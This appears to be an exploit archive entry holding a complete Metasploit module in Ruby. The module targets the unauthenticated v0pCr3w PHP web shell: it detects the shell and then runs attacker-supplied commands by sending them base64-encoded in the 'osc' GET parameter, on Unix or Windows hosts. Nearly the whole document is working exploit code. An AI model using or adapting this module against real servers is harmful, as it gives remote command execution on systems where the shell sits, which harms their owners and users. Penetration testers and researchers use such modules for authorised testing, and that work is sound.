This Metasploit module exploits a lack of authentication in the shell developed by v0pCr3w and is widely reused in automated RFI payloads. This Metasploit module takes advantage of the shell's various methods to execute commands.
c98b44143d435c087fc71dd51541d105f13f0b99cdf31def59cce893a060e474
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'v0pCr3w Web Shell Remote Code Execution',
'Description' => %q{
This module exploits a lack of authentication in the shell developed by v0pCr3w
and is widely reused in automated RFI payloads. This module takes advantage of the
shell's various methods to execute commands.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
],
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['v0pCr3w / Unix', { 'Platform' => 'unix' } ],
['v0pCr3w / Windows', { 'Platform' => 'win' } ]
],
'DisclosureDate' => 'Mar 23 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]),
],self.class)
end
def check
shell = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s),
'vars_get' => {
'lol' => '1'
}
})
if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
p = Rex::Text.encode_base64(cmd)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s),
'vars_get' => {
'osc' => p
}
})
if not (res and res.code == 200)
fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
end
end
def exploit
http_send_command(payload.encoded)
end
end